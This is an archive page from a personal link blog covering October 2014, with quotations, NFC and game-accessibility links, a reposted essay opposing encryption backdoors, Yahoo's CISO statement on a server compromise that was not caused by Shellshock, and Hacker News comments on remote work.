Friday, October 31, 2014

veruca salt, bodies.





from lizard's ghost http://ift.tt/1wMGXYN

Thursday, October 30, 2014

Those people who think they know everything are a great annoyance to those of us who do.


  • asimov.


shakespeare: The fool doth think he is wise, but the wise man knows himself to be a fool


Socrates: "I know one thing: that I know nothing."


W B Yeats: "The best lack all conviction, and the worst / Are full of passionate intensity."


Bertrand Russell: "The fundamental cause of the trouble is that in the modern world the stupid are cocksure while the intelligent are full of doubt."


Charles Darwin: "Ignorance more frequently begets confidence than does knowledge."


the Tao Te Ching: "To know that you do not know is highest. To not know but think you know is flawed. ... The sages are without fault, because they recognize the fault as a fault".


Romans 1:22. "While claiming to be wise, they became fools."

Rom 12:16 "Do not be wise in your own estimation"







from lizard's ghost http://ift.tt/1FZbclz

nfc are everywhere!

there's samsung tectiles..http://ift.tt/1tR7BC5

sony smarttags..http://ift.tt/1fGKWPq

all sorts of stuff from tagstand..http://ift.tt/1tR7yX5

moo makes nfc business cards..http://us.moo.com/nfc/

but yea, be careful..http://ift.tt/1wHha47






from lizard's ghost http://ift.tt/1tR7BC8

Wednesday, October 29, 2014

ちはやふる


and omg! its real!






from lizard's ghost http://ift.tt/13b1pK4

Saturday, October 18, 2014

the tor network





from lizard's ghost http://ift.tt/11HxGaX

Monday, October 13, 2014

able gamers, special effect and 1 button bayonetta


and What Super Smash Bros. 3DS looks like with varying types of colorblindness..

http://ift.tt/1ti96JK



"Take Bayonetta for example. Many developers would think that the core mechanic is executing complex combos. But it's not," Hamilton said. "The developers abstracted it out a bit, and [realized] that what makes the game fun is the feeling of successfully pushing your motor skills to the limit ... So they included a wide range of difficultly settings, going all the way down to a single button mode." As a result, he added, Bayonetta is, quite unexpectedly, the most accessible game of its type. Its developers understood that the point was empowering players, and that can be scaled to people of just about any ability. If someone only has the physical ability to hit one button, they could still play and get roughly the same challenge/reward balance as everyone else. For quadriplegics, that button can be mapped to a microswitch, eye motion trackers or a wide variety of other pieces of technology. The core of what Bayonetta attempts to do remains in tact regardless of input device.







from lizard's ghost http://ift.tt/1v1k9Ws

Thursday, October 09, 2014

one more parity bit please!

http://ift.tt/1mJwQDE


http://ift.tt/1qlO59w


http://ift.tt/1osVSmb






from lizard's ghost http://ift.tt/1sfO65j

oh, the cloud

what cloud? where got cloud? its just a bloody url the stupid router checks to see if there's internet connectivity isn't it? but for some reason it actually shuts down its own dns service when there isn't..why???!!!

http://ift.tt/1vKYj7Q


and btw, why not use ntp and/or dns as connectivity checks?






from lizard's ghost http://ift.tt/1sfO79y

more succinct version of 'golden key' idea, by bruce schneier

Ah, but that's the thing: You can't build a "back door" that only the good guys can walk through. Encryption protects against cybercriminals, industrial competitors, the Chinese secret police and the FBI. You're either vulnerable to eavesdropping by any of them, or you're secure from eavesdropping from all of them.

- http://ift.tt/1pSQGsh






from lizard's ghost http://ift.tt/1v4AA5M

stole this entire post from keybase 'cos i think its a keeper, sorry.

The Horror of a 'Secure Golden Key'


by Chris Coyne 10/08/2014


This week, the Washington Post's editorial board, in a widely circulated call for “compromise” on encryption, proposed that while our data should be off-limits to hackers and other bad actors, “perhaps Apple and Google could invent a kind of secure golden key” so that the good guys could get to it if necessary.


This theoretical “secure golden key” would protect privacy while allowing privileged access in cases of legal or state-security emergency. Kidnappers and terrorists are exposed, and the rest of us are safe. Sounds nice. But this proposal is nonsense, and, given the sensitivity of the issue, highly dangerous. Here’s why.


A “golden key” is just another, more pleasant, word for a backdoor—something that allows people access to your data without going through you directly. This backdoor would, by design, allow Apple and Google to view your password-protected files if they received a subpoena or some other government directive. You'd pick your own password for when you needed your data, but the companies would also get one, of their choosing. With it, they could open any of your docs: your photos, your messages, your diary, whatever.


The Post assumes that a “secure key” means hackers, foreign governments, and curious employees could never break into this system. They also assume it would be immune to bugs. They envision a magic tool that only the righteous may wield. Does this sound familiar?

Government or Apple employee in the year 2015


Practically speaking, the Washington Post has proposed the impossible. If Apple, Google and Uncle Sam hold keys to your documents, you will be at great risk.

In case you're not a criminal


Perhaps the reason the WaPo is so confused is that FBI Director James Comey has told the media that Apple's anti-backdoor stance only protects criminals. Unfortunately he's not seeing beyond his own job, and WaPo didn't look much further.


Apple’s anti-backdoor policy aims to protect everyone. The following is a list of real threats their policy would thwart. Not threats to terrorists or kidnappers, but to 300 million Americans and 7 billion humans who are moving their intimate documents into the cloud. Make no mistake, what Apple and Google are proposing protects you.


Whether you're a regular, honest person, or a US legislator trying to understand this issue, understand this list.

Threat #1. It Protects You From Hackers


If Apple has the key to unlock your data legally, that can also be used illegally, without Apple's cooperation. Home Depot and Target? They were recently hacked to the tune of 100 million accounts.


Despite great financial and legal incentive to keep your data safe, they could not.


But finance is mostly boring. Other digital documents are very, very personal.

Consider: she deleted her pics long ago...we'll get to data permanence in a bit.


So hackers have (1) stolen everyone's credit cards, and (2) stolen celebrities' personal pictures. Up next: your personal pics, videos, docs, messages, medical data, and diary. With the Washington Post's proposal, it will all be leaked, a kind of secure golden shower.


There is some hope. If your data were locked with a strong password that only you knew, only on your device, then the best hackers could get nothing by hacking Apple's data servers. They’d look for your pictures but find an unintelligible pile of goops instead.


To begin to protect yourself, you need the legal right to a real, working password that only you know.

Threat #2. It Protects You From Foreign-government breaches


As it stands, the NSA, China, Russia: anyone could be inside Apple, Google, and Microsoft, quietly collecting data, building dossiers on anyone in the world, harnessing the system normally used to answer "lawful" warrant requests. This is a different kind of risk from what we've seen with Home Depot and Target, because we can't see how often it's happening.


Even if you trust the U.S. government to act in your best interest (say, by foiling terrorists), do you trust the Russian government? Do you trust the Chinese? If a door is open to one organization, it is open to all.

The government's tool can be stolen or copied


Again, this can only be solved with a real, working password that only you know.

Threat #3. It Protects You From Human Error


Did you know: On June 20, 2011 Dropbox let anyone on the site login as any other user? On that day, anyone could read or download anyone else's documents. Will this happen again? Can laws against data leaks protect us? Of course not. Laws, policy, even honest, well-meaning effort can't prevent human error. It's inevitable.


When you host your data and your keys "in the cloud", your data is only as strong as the weakest programmer who has access.


On a technical tangent, a proposed solution to this -- and threats 1 & 2 -- involves your device having half of a key, so a bug wouldn't expose your data to anyone, unless they also got your device. (Security on iOS7 worked this way.) This failed for users because phones, computers, and tablets are thrown away, shared, sent in for service, refurbished, and recycled. Old devices are everywhere and easy to acquire. Apple recognized this and fixed it in iOS8.


You must be allowed to throw away your data without hunting down every device you've ever used.


The only solution is a real, single password that only you know.

Threat #4. It Protects You From the future


This is the greatest threat of all.


Our cloud data is stored for eternity, not the moment. Legislation and company policy cannot guarantee backups are destroyed. Our government may change, and what qualifies as a "lawful" warrant tomorrow might be illegal today. Similarly, your eternal data might be legal today and a threat tomorrow.


What you consider cool today might be an embarrassment or personal risk tomorrow. A photo you can rip to pieces, a letter you can shred, a diary you can burn, an old flag you can take out into the woods with your friends and shoot with a bb-gun till it's destroyed and then have a nice, cold beer to celebrate. Cheers to that.


But memories in the cloud are there forever. You will never be able to destroy them. That data is backed-up, distributed, redundant, and permanent. I can tell you first-hand: do not assume that when you click "delete" a file is gone. Take Mary Winstead’s word for it. Bugs and tape backups often keep things around, regardless of the law or programmer effort. This is one of the single hairiest technical problems of today.


Instead, how can you burn that digital love letter, or tear up that digital picture? The only answer is to start with it encrypted, and then throw away the only key.


You need the legal right to use software that makes you the sole owner of that key.


~ ~ ~ ~ ~ ~ ~ ~ ~


The above are all practical threats to good people. Still, even if you're sitting back feeling immune to embarrassment, hackers, foreign governments, bugs, dystopias, and disgruntled employees, there are still deep, philosophical, human considerations.

Consideration #1 - The invasion of personal space should be detectable


Even if you have nothing to hide in your home, you'd like to know if it's been entered.


In general, when your personal space is invaded, you want to know. Historically, this was easy. You had neighbors who could watch your doors, maybe some cameras, maybe an alarm system. You licked your envelopes. An intruder - legal or not - was someone you could hope to catch.


Therefore - in the absence of a breach - you could believe your home was not entered by the police or a criminal. This felt good. It even made you like your government.


When Apple built iOS8, they took the stance that your data qualifies as personal space. Even if you host it in the cloud. For someone to break in, they have to come through you.

Consideration #2 - Our cloud data is becoming an extension of our minds.


Beyond all the technical considerations, there is a sea change in what we are digitizing.


We whisper “I love you” through the cloud. We have pictures of our kids in the bath tub. Our teens are sexting. We fight with our friends. We talk shit about the government. We embarrass ourselves. We watch our babies on cloud cameras. We take pictures of our funny moles. We ask Google things we might not even ask our doctor.


Even our passing thoughts and fears are going onto our devices.


Time was, all these things we said in passing were ephemeral. We could conveniently pretend to forget. Or actually forget. Thanks to the way our lives have changed, we no longer have that option.


This phenomenon is accelerating. In 10 years, our glasses may see what we see, hear what we hear. Our watches and implants and security systems of tomorrow may know when we have fevers, when we're stressed out, when our hearts are pounding, when we have sex and - wow - who's in the room with us, and who's on top and what direction they're facing*. Google and Apple and their successors will host all this data.


We're not talking about documents anymore: we're talking about everything.


You should be allowed to forget some of it. And to protect it from all the dangers mentioned above.


You should want all this intimate data password-protected, with a single key only you know. You should hope that Google, Apple, and Microsoft all support this decision. More important, you should hope that the government legally allows them and even encourages them to make this decision. It's a hard enough technical problem. Let's not make it a legal one.

In conclusion


Is Apple's solution correct? I don't know. It needs to be studied. But either way, they should be allowed to try. They should be allowed to make software with no backdoor.


Is the Washington Post's "secure golden key" a good idea? No it isn't. Whether it's legally enforced or voluntary, it's a misguided, dangerous proposal. It will become more dangerous with time.


Honest, good people are endangered by any backdoor that bypasses their own passwords.


-Chris Coyne (comments welcome ) http://ift.tt/1v2PlG5






from lizard's ghost http://ift.tt/1pSQER9

whats this song?


and yet another one man hero effort...i thought banished was it...






from lizard's ghost http://ift.tt/1pSQEAG

Tuesday, October 07, 2014

yahoo not shellshocked

Howdy, Hacker News. I’m the CISO of Yahoo and I wanted to clear up some misconceptions.


Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock.


Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.


Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.


As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected!


I also want to address another issue: Yahoo takes external security reports seriously and we strive to respond immediately to credible tips. We monitor our Bug Bounty (bugbounty.yahoo.com) and security aliases (security@yahoo.com) 24x7, and our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation. We run one of the most successful Bug Bounty programs in the world and I hope everybody here will participate and help us keep our users safe.


We’re always looking for people who want to keep nearly a billion users safe at scale. paranoids-hiring@yahoo-inc.com







from lizard's ghost http://ift.tt/1CQCNCK

Monday, October 06, 2014

bash-chef, inspeqtor monitoring

http://ift.tt/1jqk4s6


http://ift.tt/1rzn5cG






from lizard's ghost http://ift.tt/1vE4LwZ

Saturday, October 04, 2014

Thursday, October 02, 2014

so reddit is trying to end remote work

chuckcode 4 hours ago | link


Seems like a lot of great open source software projects are run almost completely with remote teams - linux, git, apache, R, python, etc. have a lot of "remote" developers.


Why do so many companies discourage remote teams? Hard to ignore the fact that you can get access to a much larger pool of developers and often for lower cost. Is there something fundamentally different about software development for a company vs opens source. Are the open source projects managed better/differently in some way to make these remote worker projects succeed?


reply


judk 1 hour ago | link


Open source projects have better managers than reddit.


reply







from lizard's ghost http://ift.tt/1x0XpVF

taiga.io

from http://ift.tt/1pqBemK..



Taiga.io hit #1 on @HackerNewsYCBot for a while today (thanks HN!). Traffic up 100x. I was dumb enough to ask our developers if we could handle it. This is what they sent back







from lizard's ghost http://ift.tt/1rKkYS9